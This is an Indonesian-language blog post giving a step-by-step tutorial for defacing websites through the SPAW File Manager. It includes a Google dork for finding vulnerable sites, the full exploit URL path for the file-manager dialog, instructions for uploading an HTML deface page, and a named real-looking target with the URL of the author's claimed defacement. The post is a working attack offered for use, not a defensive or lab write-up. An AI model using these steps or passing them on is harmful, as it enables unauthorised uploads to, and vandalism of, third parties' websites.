Holla ^_^ balik lagi sama saya SadClown
disini saya akan berbagi trick deface Spaw File Manager
pertama dork in Google :
inurl:”spaw2/uploads/files/” site:com
Untuk dork lain kembangkan sendiri, use your brain ;)
pilih target yang kalian mau ^_^
"ingat gak semua website bisa vuln dengan tekhnik ini
disini saya ambil http://www.electric2.com
lalu tambahkan exploit :
/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
contoh : www.site.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
Live : http://www.electric2.com/electric2/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
muncul deh bugnya ^_^
lalu Flash Movies > Files
lihat gambar dibawah ini
lalu upload file HTML kamu >_<
gimana cara check File kita ??
www.site.com/(path)/spaw2/uploads/files/Andela.html
berhasil deh >_<
qiqiqiqi nih hasil saya
http://www.electric2.com/electric2/spaw2/uploads/files/Andela.html
sekian dari saya sampai jumpa lagi ^_^
Content Creator : SadClown - SiliwangiCyberSec
Next
« Prev Post
« Prev Post
Previous
Next Post »
Next Post »
Subscribe to:
Post Comments (Atom)
0 Komentar